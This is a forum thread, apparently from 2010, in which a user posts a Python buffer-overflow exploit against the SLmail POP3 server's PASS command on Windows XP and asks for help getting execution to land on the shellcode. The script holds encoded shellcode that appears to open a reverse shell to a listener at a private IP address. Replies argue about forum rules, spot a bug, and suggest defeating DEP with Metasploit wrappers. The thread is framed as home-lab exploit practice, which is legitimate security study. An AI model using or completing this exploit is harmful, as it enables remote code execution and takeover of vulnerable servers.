Please help
Page 1 of 2 12 LastLast
Results 1 to 10 of 17

Thread: Please help

Hybrid View

  1. #1
    Junior Member
    Join Date
    Jan 2010
    Posts
    6

    Please help

    The target is an xp sp2 machine running a SLmail server which I know is vulnerable to buffer overflow with the PASS command. So I whipped up the following script:
    #!/usr/bin/python
    import struct
    import socket
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    shellcode =("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24" +
    "\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f" +
    "\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84" +
    "\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28" +
    "\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c" +
    "\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" +
    "\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e" +
    "\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" +
    "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50" +
    "\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff" +
    "\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43" +
    "\x53\x43\x53\xff\xd0\x68\xc0\xa8\x02\x6c\x66\x68\x11\x5c" +
    "\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff\xd6\x6a" +
    "\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a\x50" +
    "\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95" +
    "\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab" +
    "\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51" +
    "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05" +
    "\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6" +
    "\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a" +
    "\x04\x5f\x53\xff\xd6\xff\xd0")
    # where 0x01c7a18b is a JMP ESP in user32.dll on xp sp2
    # buffer = '\x41' * 4654 + struct.pack('<L', 0x01c7a18b) + '\x90' * 16 +shellcode
    buffer = '\x41' * 4654 + '\x42' * 4 + '\x43' * 48
    print "\nSending evil buffer..."
    s.connect (('192.168.2.104',110))
    data = s.recv(1024)
    s.send('USER ftp' + '\r\n')
    data = s.recv(1024)
    s.send('PASS ' + buffer + '\r\n')
    data = s.recv(1024)
    s.close()
    the resulting crash shows my four B's sitting pretty in EIP but when I pass the address of a JMP ESP in user32.dll (done in this case by changing the commented line) the resulting crash holds a different address in EIP which does not point towards my shellcode.
    I am certain that some one will point out my stupid mistake easily but I have been working on this all day and still it does not work...
    Thanks in advance for the help,
    Ey3l45h
    Last edited by ey3l45h; January 7th, 2010 at 04:17 PM. Reason: I copied and pasted the wrong version of the script.

  2. #2
    StOrM™
    Join Date
    Aug 2004
    Posts
    1,003
    You are obviously going to get banned if you don't remove that. While I am sure you are not going to read this, anyways - http://antionline.com/faq.php?faq=vb...eading_posting
    Parth Maniar,
    CISSP, CISM, CISA, SSCP

    *Thank you GOD*

    Greater the Difficulty, SWEETER the Victory.

    Believe in yourself.

  3. #3
    AO BOFH: Luser Abuser BModeratorFH gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    If he's the owner of the machine he's attempting this on, there isn't any law being broken. Wasn't asked in the best manner, but, if the machine is his, there shouldn't be an issue. Other than others here probably not wanting to answer since we have a corporate owner who has to be responsible for any problems on here. The staff here are generally into the stuff we do here (I mean the staff, the mods obviously have an interest) but their bosses, probably not heh.
    Kill the lights, let the candles burn behind the pumpkins’ mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again everyday is Halloween.The Misfits FreeBSD
    Cannibal Holocaust
    SuSE Linux
    Slackware Linux

  4. #4
    Junior Member
    Join Date
    Jan 2010
    Posts
    6
    @byte~ I am sorry I did not see any where in the rules where it said that one could not post educational projects. Of course this is for practice on my home lab. If you could please link me to something which shows a rule I have broken I would be the first to remove my post. Thanks for the flaming.
    @gore~ I recognize that I could have worded that better. I have been a long time reader of AO and this was my first post. If you have some advice which would help in the future maybe some other forums which would be able to help I would love to hear it.

    The question still stands I still don't know why the address I am entering is destroying the stack in such a way that I can not get to my JMP ESP.

    k thanx bye,

    ey3l45h

  5. #5
    Senior Member t34b4g5's Avatar
    Join Date
    Sep 2003
    Location
    Australia.
    Posts
    2,391

    Smile

    Quote Originally Posted by ey3l45h View Post
    If you could please link me to something which shows a rule I have broken I would be the first to remove my post. Thanks for the flaming.
    Acceptable Use Policy
    (Bottom of the page)


    As Gore mentioned AntiOnline is owned and run by a Corporate Company.

    About Internet.com
    Copyright 2010 QuinStreet Inc. All Rights Reserved.

    no need to remove the post, i'm interested to see where this goes.

  6. #6
    AO BOFH: Luser Abuser BModeratorFH gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    I didn't see a problem with it so I left it alone too. He owns the machine and is simply trying to learn something, and isn't breaking any laws since, again, the machine is his, so he can do with it what he likes. So I just left it alone to grow lol.
    Kill the lights, let the candles burn behind the pumpkins’ mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again everyday is Halloween.The Misfits FreeBSD
    Cannibal Holocaust
    SuSE Linux
    Slackware Linux

  7. #7
    Banned
    Join Date
    Jan 2008
    Posts
    605
    actually once it crashed EIP held "00000000"
    Its supposed to do that since its no longer held in memory. Without the process up and running there would be no need to store a memory address.

  8. #8
    Banned
    Join Date
    Jan 2008
    Posts
    605
    Doesn't even look like the shell is sent to anything at all. It just looks like an unused string in this script to me.

  9. #9
    Junior Member
    Join Date
    Jan 2010
    Posts
    6
    @~Spec You are right I was changing a few I am about to edit that... it did get sent in the script that I ran. I accidentally did not add it to the end of the commented line...

  10. #10
    Banned
    Join Date
    Nov 2002
    Posts
    677
    Not sure but can this be any service to you?
    Data Execution Prevention (DEP) is a security feature included in modern Microsoft Windows operating systems that is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow, for example.
    http://en.wikipedia.org/wiki/Data_Execution_Prevention

    I believe metasploit has some wrappers to defeat this protection. Just convert script procedure to your code.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •